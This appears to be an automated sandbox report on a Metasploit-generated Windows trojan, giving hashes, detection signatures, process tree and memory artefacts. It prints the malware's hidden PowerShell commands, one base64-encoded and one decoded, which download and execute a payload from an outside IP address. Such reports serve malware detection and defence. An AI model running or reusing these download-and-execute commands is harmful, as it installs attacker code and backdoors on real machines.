metasploit | c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63

General

Target

c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
Size

28KB
MD5

2604e69479154e5d7ddc00115706ef0f
SHA1

66c3a2ca32c785a3e3850354388e9259b5a8feb4
SHA256

c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63
SHA512

9d6a4d5bf57d24375e991092575ce4fcc7ffa6302adf72ff584abbc3de9d4a7b14be7cfdedfc7d2f5adf41d2268f4e8744b7d02a5eb59efda5a47d6665dea3d6

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://45.32.16.170:80/a

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

33 4408 powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1560 powershell.exe
1560 powershell.exe
4408 powershell.exe
4408 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1560 powershell.exe
Token: SeDebugPrivilege 4408 powershell.exe

flow	pid	process
33	4408	powershell.exe

pid	process
1560	powershell.exe
1560	powershell.exe
4408	powershell.exe
4408	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	4408	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exepowershell.exe

description	pid	process	target process
PID 4768 wrote to memory of 1560	4768	c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe	powershell.exe
PID 4768 wrote to memory of 1560	4768	c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe	powershell.exe
PID 4768 wrote to memory of 1560	4768	c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe	powershell.exe
PID 1560 wrote to memory of 4408	1560	powershell.exe	powershell.exe
PID 1560 wrote to memory of 4408	1560	powershell.exe	powershell.exe
PID 1560 wrote to memory of 4408	1560	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
"C:\Users\Admin\AppData\Local\Temp\c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEANgAuADEANwAwADoAOAAwAC8AYQAnACkAKQAiAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://45.32.16.170:80/a'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
6195a91754effb4df74dbc72cdf4f7a6

SHA1
aba262f5726c6d77659fe0d3195e36a85046b427

SHA256
3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

SHA512
ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
8d19b0dcdb54679f4470f3c2b6ffb7ad

SHA1
3f10a4163430fc7af30b7c57a1b89315f88ea479

SHA256
bafea111054a0004cbf26afac12e150ca52d34c6a0957f4997c4d68e97d31b1b

SHA512
7844e974592f18af89d15c2281b5f187cd638bca373edf4b8af68182885e24d96612ecb9cbc1e295a84f9816f22896c5185271beefcb9054c9af50baf2e4c68c

Download Submit
memory/1560-136-0x0000000004E70000-0x0000000004ED6000-memory.dmp

Filesize
408KB

Download
memory/1560-133-0x0000000004F90000-0x00000000055B8000-memory.dmp

Filesize
6.2MB

Download
memory/1560-134-0x0000000004C30000-0x0000000004C52000-memory.dmp

Filesize
136KB

Download
memory/1560-135-0x0000000004D50000-0x0000000004DB6000-memory.dmp

Filesize
408KB

Download
memory/1560-137-0x0000000004F70000-0x0000000004F8E000-memory.dmp

Filesize
120KB

Download
memory/1560-132-0x0000000002710000-0x0000000002746000-memory.dmp

Filesize
216KB

Download
memory/1560-131-0x0000000000000000-mapping.dmp

Download
memory/4408-138-0x0000000000000000-mapping.dmp

Download
memory/4408-139-0x0000000008110000-0x000000000878A000-memory.dmp

Filesize
6.5MB

Download
memory/4408-140-0x0000000006CB0000-0x0000000006CCA000-memory.dmp

Filesize
104KB

Download
memory/4768-130-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4768-143-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing